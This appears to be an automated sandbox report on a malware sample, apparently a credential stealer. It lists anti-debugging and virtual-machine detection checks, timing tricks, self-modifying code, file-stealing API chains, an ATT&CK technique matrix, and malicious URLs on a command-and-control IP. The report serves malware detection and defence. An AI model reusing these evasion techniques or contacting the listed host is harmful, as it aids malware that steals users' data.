              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCC83 second address: 9BCCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F052CBC2117h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BCCA4 second address: 9BCCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F052CEB1F21h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F052CEB1F29h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90245 second address: 4C9025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9025E second address: 4C90289 instructions: 0x00000000 rdtsc 0x00000002 call 00007F052CEB1F29h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 79F237B4h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90289 second address: 4C9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9028D second address: 4C90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90293 second address: 4C902AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC210Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902AC second address: 4C902B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902B0 second address: 4C902B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C902B6 second address: 4C90300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007F052CEB1F1Dh 0x00000013 and ch, 00000036h 0x00000016 jmp 00007F052CEB1F21h 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov ah, dl 0x0000001f popad 0x00000020 pop ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov di, ax 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9036B second address: 4C90387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2118h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90387 second address: 4C9038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9038B second address: 4C903CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F052CBC2119h 0x00000014 and esi, 1ACE9FC6h 0x0000001a jmp 00007F052CBC2111h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903CC second address: 4C903FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CEB1F27h 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F052CEB1F21h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C903FF second address: 4C9042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F052CBC210Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9042B second address: 4C9042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9042F second address: 4C9044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9044C second address: 4C90452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90452 second address: 4C90456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D95FA second address: 8D95FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 71D4E2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 957C3E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision
              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
              Source: C:\Users\user\Desktop\file.exe API coverage: 4.8 %
              Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_004E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_004EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_004F1BF0
              Source: file.exe, file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2239380826.0000000000D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarez
              Source: file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25982
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25990
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25853
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25835
              Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4A60 VirtualProtect 00000000,00000004,00000100,?0_2_004D4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 mov eax, dword ptr fs:[00000030h]0_2_004F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004F2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_004F4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004F46A0
              Source: file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Program Manager
              Source: file.exeBinary or memory string: d6Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_004F2D60
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_004F2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004F2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_004F2C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpu9100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpI9100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpy9100%Avira URL Cloudmalware
              http://185.215.113.206tD0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
